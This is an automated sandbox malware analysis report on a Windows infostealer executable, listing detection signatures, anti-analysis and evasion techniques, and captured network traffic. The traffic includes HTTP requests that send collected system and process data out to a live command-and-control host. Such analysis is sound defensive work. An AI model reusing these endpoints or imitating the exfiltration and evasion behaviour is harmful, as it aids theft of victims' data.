Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ivHDHq51Ar.exe

Overview

General Information

Sample name:ivHDHq51Ar.exe
renamed because original name is a hash value
Original sample name:27b03055c39daab2ce7ae0c5a369f0f1.exe
Analysis ID:1582697
MD5:27b03055c39daab2ce7ae0c5a369f0f1
SHA1:51c5eb4f2e29c659403437063502a061945265de
SHA256:f2d3aa2010aa17c79bd549f081efe1ef635b8e12ae150f200f8d2769b960bd4b
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create an SMB header
Detected non-DNS traffic on DNS port
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • ivHDHq51Ar.exe (PID: 1136 cmdline: "C:\Users\user\Desktop\ivHDHq51Ar.exe" MD5: 27B03055C39DAAB2CE7AE0C5A369F0F1)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: ivHDHq51Ar.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: ivHDHq51Ar.exeVirustotal: Detection: 43%Perma Link
Source: ivHDHq51Ar.exeReversingLabs: Detection: 55%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: ivHDHq51Ar.exeJoe Sandbox ML: detected
Source: ivHDHq51Ar.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_001BA5B0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_001BA7F0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_001BA7F0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_001BA7F0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_001BA7F0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_001BA7F0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_001BA7F0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_001BB560
Source: ivHDHq51Ar.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_0015255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0015255D
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_001529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_001529FF
Source: global trafficTCP traffic: 192.168.2.9:61633 -> 1.1.1.1:53
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1Host: home.fiveth5vs.topAccept: */*Content-Type: application/jsonContent-Length: 501538Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 38 35 39 30 39 31 33 37 32 30 36 37 38 33 37 37 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: GET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1Host: home.fiveth5vs.topAccept: */*
Source: global trafficHTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1Host: home.fiveth5vs.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox ViewASN Name: VANNINVENTURESGB VANNINVENTURESGB
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_0021A8C0 recvfrom,0_2_0021A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1Host: home.fiveth5vs.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5vs.top
Source: unknownHTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1Host: home.fiveth5vs.topAccept: */*Content-Type: application/jsonContent-Length: 501538Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 38 35 39 30 39 31 33 37 32 30 36 37 38 33 37 37 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Tue, 31 Dec 2024 08:45:30 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Tue, 31 Dec 2024 08:45:32 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17
Source: ivHDHq51Ar.exe, 00000000.00000002.1635584991.0000000001496000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607874627.0000000001496000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607649425.0000000001496000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737
Source: ivHDHq51Ar.exe, 00000000.00000002.1635584991.0000000001496000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607874627.0000000001496000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607649425.0000000001496000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377374fd4
Source: ivHDHq51Ar.exe, 00000000.00000002.1635584991.0000000001496000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607874627.0000000001496000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607649425.0000000001496000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377376963
Source: ivHDHq51Ar.exe, 00000000.00000002.1635378127.000000000144E000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1635584991.0000000001484000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607874627.0000000001484000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607649425.0000000001481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0
Source: ivHDHq51Ar.exe, 00000000.00000002.1635378127.000000000144E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=000
Source: ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWl
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: ivHDHq51Ar.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: ivHDHq51Ar.exe, ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705

System Summary

barindex
PE file contains section with special chars
Source: ivHDHq51Ar.exeStatic PE information: section name:
Source: ivHDHq51Ar.exeStatic PE information: section name: .idata
Source: ivHDHq51Ar.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_3_014EA9BD0_3_014EA9BD
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_001605B00_2_001605B0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_00166FA00_2_00166FA0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_0018F1000_2_0018F100
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_0021B1800_2_0021B180
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_004DE0500_2_004DE050
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_004DA0000_2_004DA000
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_002200E00_2_002200E0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_001B62100_2_001B6210
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_0021C3200_2_0021C320
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_002204200_2_00220420
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_004A44100_2_004A4410
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_0015E6200_2_0015E620
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_0021C7700_2_0021C770
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_004B67300_2_004B6730
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_004D47800_2_004D4780
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_001BA7F00_2_001BA7F0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_0020C9000_2_0020C900
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_001649400_2_00164940
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_0015A9600_2_0015A960
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_0040AAC00_2_0040AAC0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_00326AC00_2_00326AC0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_002E4B600_2_002E4B60
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_0040AB2C0_2_0040AB2C
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_0015CBB00_2_0015CBB0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_004C8BF00_2_004C8BF0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_004DCC900_2_004DCC90
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_004D4D400_2_004D4D40
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_00310D800_2_00310D80
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_004CCD800_2_004CCD80
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_0046AE300_2_0046AE30
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_00174F700_2_00174F70
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_0021EF900_2_0021EF90
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_00218F900_2_00218F90
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_004A2F900_2_004A2F90
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_001610E60_2_001610E6
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_004BD4300_2_004BD430
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_004C35B00_2_004C35B0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_004E17A00_2_004E17A0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: String function: 001571E0 appears 40 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: String function: 0015CAA0 appears 59 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: String function: 00307220 appears 91 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: String function: 001950A0 appears 81 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: String function: 0016CD40 appears 63 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: String function: 0016CCD0 appears 53 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: String function: 0032CBC0 appears 85 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: String function: 00194F40 appears 277 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: String function: 001575A0 appears 543 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: String function: 00194FD0 appears 200 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: String function: 001573F0 appears 99 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: String function: 002344A0 appears 56 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: String function: 00195340 appears 34 times
Source: ivHDHq51Ar.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: ivHDHq51Ar.exeStatic PE information: Section: niwiuhuq ZLIB complexity 0.9945142804928989
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_0015255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0015255D
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_001529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_001529FF
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
